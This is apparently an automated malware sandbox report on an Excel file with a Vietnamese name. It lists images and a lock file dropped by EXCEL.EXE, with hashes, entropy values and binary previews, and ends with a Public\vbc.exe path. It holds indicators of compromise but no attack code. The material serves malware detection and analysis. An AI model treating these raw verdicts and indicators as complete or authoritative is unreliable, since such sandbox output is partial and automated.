          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\382BCCC6.emf
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):7788
          Entropy (8bit):5.533196327083454
          Encrypted:false
          SSDEEP:96:wMX6CblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wOjTNAK4oOIGbK1RvVwPAWmOHX
          MD5:1F2B5AACC9C5B04A836533E30B3A31F3
          SHA1:18374AF46557DCAE4A34CC6CA4B7F8CAA59934F5
          SHA-256:0407CDBEA25671B4478D8E9502F556385A2D0A076947E5BECFBC88A27DCC23DB
          SHA-512:4879FAA99D08FD8569DE1887FDDC023CAB1C28DC75B0D2CE6E65FC07A381B7D8DA63D7C47A78E7B5C4D1DC9D7EFCBA456094DFBED34F96358124DE6192CE7368
          Malicious:false
          Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X...0...d.....................o...o...p....\.....o.......o.l.o...p......o.<5.u..p....`.pHx..$y.w............(.o....w....$.....8.d.........o..^.p.....^.p8..............-...T.o..<.w................<.9u.Z.v....X.\....Hx.........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A9AFE9C.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
          Category:dropped
          Size (bytes):8815
          Entropy (8bit):7.944898651451431
          Encrypted:false
          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
          MD5:F06432656347B7042C803FE58F4043E1
          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
          Malicious:false
          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D45ADF5.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
          Category:dropped
          Size (bytes):14198
          Entropy (8bit):7.916688725116637
          Encrypted:false
          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
          SHA1:72CA86D260330FC32246D28349C07933E427065D
          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
          Malicious:false
          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D264A0F.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
          Category:dropped
          Size (bytes):85020
          Entropy (8bit):7.2472785111025875
          Encrypted:false
          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
          MD5:738BDB90A9D8929A5FB2D06775F3336F
          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
          Malicious:false
          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67EABCC4.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
          Category:dropped
          Size (bytes):8815
          Entropy (8bit):7.944898651451431
          Encrypted:false
          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
          MD5:F06432656347B7042C803FE58F4043E1
          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
          Malicious:false
          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78100EDE.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):84203
          Entropy (8bit):7.979766688932294
          Encrypted:false
          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
          MD5:208FD40D2F72D9AED77A86A44782E9E2
          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
          Malicious:false
          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FF60B83.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):6815
          Entropy (8bit):7.871668067811304
          Encrypted:false
          SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
          MD5:E2267BEF7933F02C009EAEFC464EB83D
          SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
          SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
          SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
          Malicious:false
          Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E3548CB.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):6815
          Entropy (8bit):7.871668067811304
          Encrypted:false
          SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
          MD5:E2267BEF7933F02C009EAEFC464EB83D
          SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
          SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
          SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
          Malicious:false
          Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F889450.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):33795
          Entropy (8bit):7.909466841535462
          Encrypted:false
          SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
          MD5:613C306C3CC7C3367595D71BEECD5DE4
          SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
          SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
          SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
          Malicious:false
          Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988D15ED.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
          Category:dropped
          Size (bytes):14198
          Entropy (8bit):7.916688725116637
          Encrypted:false
          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
          SHA1:72CA86D260330FC32246D28349C07933E427065D
          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
          Malicious:false
          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7DFC7A8.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):33795
          Entropy (8bit):7.909466841535462
          Encrypted:false
          SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
          MD5:613C306C3CC7C3367595D71BEECD5DE4
          SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
          SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
          SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
          Malicious:false
          Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC67372.png
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):49744
          Entropy (8bit):7.99056926749243
          Encrypted:true
          SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
          MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
          SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
          SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
          SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
          Malicious:false
          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA784B99.emf
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):648132
          Entropy (8bit):2.812379565083531
          Encrypted:false
          SSDEEP:3072:434UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:C4UcLe0JOcXuunhqcS
          MD5:31BA65BE1FB493107F7F598925CE6CC5
          SHA1:D732A62C6A995EED0D5CBF4E8BD8CB774BE2BA02
          SHA-256:02DF6DD93E56D18723A9A865B0877D0A440A156050DF91B7B81CD8288B94D504
          SHA-512:D0CFDF82446BC4587D6881F29D8B3198F87486F094B416EC7B7EDD68BE735E8BBE344EF1A6598AA97F688234578B83D03069D91B69FE59EAB957DCB4F13D3070
          Malicious:false
          Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$...,...-z.X.@..%.......L...........0....NVZ.....................NVZ........ ....y.X........ .........r..z.X........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........<...X.................r....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F26B3547.jpeg
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
          Category:dropped
          Size (bytes):85020
          Entropy (8bit):7.2472785111025875
          Encrypted:false
          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
          MD5:738BDB90A9D8929A5FB2D06775F3336F
          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
          Malicious:false
          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
          C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):330
          Entropy (8bit):1.4377382811115937
          Encrypted:false
          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
          MD5:96114D75E30EBD26B572C1FC83D1D02E
          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
          Malicious:true
          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          C:\Users\Public\vbc.exe
